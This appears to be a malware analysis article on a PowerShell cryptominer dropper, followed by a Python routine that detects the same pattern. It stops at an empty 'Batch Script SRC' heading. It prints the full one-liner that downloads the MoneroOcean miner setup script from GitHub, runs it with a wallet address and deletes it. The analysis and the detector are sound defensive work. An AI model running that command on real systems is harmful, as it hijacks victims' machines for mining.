Analysis CryptoMiner Sample ( Script Based )

In this article we will start analyzing a PowerShell script that downloads and runs another batch script to perform crypto mining. Crypto mining is conducted using specialized computer hardware to solve complex mathematical puzzles, validating and recording transactions on a blockchain.

Sample SHA-256 :  d27411cd11d31d025ccc9fac9d49aa5a91aa934e9964a54340e25fbff886ed9b

Malicious Code ( First Stage ) :

powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat';
$wc.DownloadFile('https[://]raw[.]githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $tempfile); &
$tempfile 85qqTVL8RQGJSvZMfenDwqBUyVrsaNpVWUMxnXKzbcwAM; Remove-Item -Force $tempfile"

Malicious Code Analysis ( First Stage ) :

1- The malware developer declares a variable holding a WebClient object, used to download content from the internet and drop it into the %TEMP% folder.

Code (1) : powershell -Command "$wc = New-Object System.Net.WebClient;

2- Downloading process: $wc.DownloadFile('https[://]raw[.]githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $tempfile) fetches the second-stage batch script from GitHub into the temp file, which is then executed with the call operator (&) and deleted with Remove-Item.
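The download -> drop -> execute -> delete chain above is what a defender can match on in process-creation telemetry. The following detection routine is an added example (not code from the original article or from the xmrig_setup project); it runs over constructed command lines, with the sample's URL kept defanged, and the sample names, regexes and verdict labels are assumptions.

```python
import re
# Constructed sample process-creation command lines (not real telemetry).
# The first mirrors the first-stage dropper analysed above, URL kept defanged.
SAMPLE_CMDLINES = [
    "powershell -Command \"$wc = New-Object System.Net.WebClient; "
    "$tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; "
    "$wc.DownloadFile('https[://]raw[.]githubusercontent.com/MoneroOcean/xmrig_setup"
    "/master/setup_moneroocean_miner.bat', $tempfile); & $tempfile "
    "85qqTVL8RQGJSvZMfenDwqBUyVrsaNpVWUMxnXKzbcwAM; Remove-Item -Force $tempfile\"",
    # Benign admin one-liner: no download, no dropped file executed.
    "powershell -Command \"Get-ChildItem C:\\Windows\\Temp | Measure-Object\"",
    # Download without execution (e.g. fetching an installer): suspicious only.
    "powershell -Command \"(New-Object Net.WebClient).DownloadFile("
    "'https://example.invalid/a.msi', 'C:\\tmp\\a.msi')\"",
]

# One regex per stage of the download -> drop -> execute -> delete chain.
STAGES = {
    "download":   re.compile(r"Net\.WebClient|DownloadFile\(", re.I),
    "temp_drop":  re.compile(r"GetTempFileName\(\)", re.I),
    "script_ext": re.compile(r"\+=\s*'\.(bat|cmd|ps1|vbs|js)'", re.I),
    "exec_var":   re.compile(r"&\s*\$(\w+)"),               # call operator on a variable
    "cleanup":    re.compile(r"Remove-Item\s+(?:-Force\s+)?\$(\w+)", re.I),
}
URL_RE = re.compile(r"DownloadFile\(\s*'([^']+)'", re.I)   # download source
ARGS_RE = re.compile(r"&\s*\$\w+\s+([^;\"]+)")             # args after `& $var`

def analyze_cmdline(cmdline):
    """Return the stages found, the download source, the arguments handed to
    the executed temp file, and a verdict for the whole command line."""
    found = {name: rx.search(cmdline) for name, rx in STAGES.items()}
    stages = [name for name, m in found.items() if m]
    url_m, args_m = URL_RE.search(cmdline), ARGS_RE.search(cmdline)
    # Strongest signal: the same variable is executed and then deleted.
    same_var = bool(found["exec_var"] and found["cleanup"]
                    and found["exec_var"].group(1) == found["cleanup"].group(1))
    if "download" in stages and "exec_var" in stages and (same_var or "temp_drop" in stages):
        verdict = "dropper"
    elif "download" in stages:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "stages": stages,
            "url": url_m.group(1) if url_m else None,
            "args": args_m.group(1).split() if args_m else []}

if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(analyze_cmdline(cmd))
```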

Batch Script SRC :
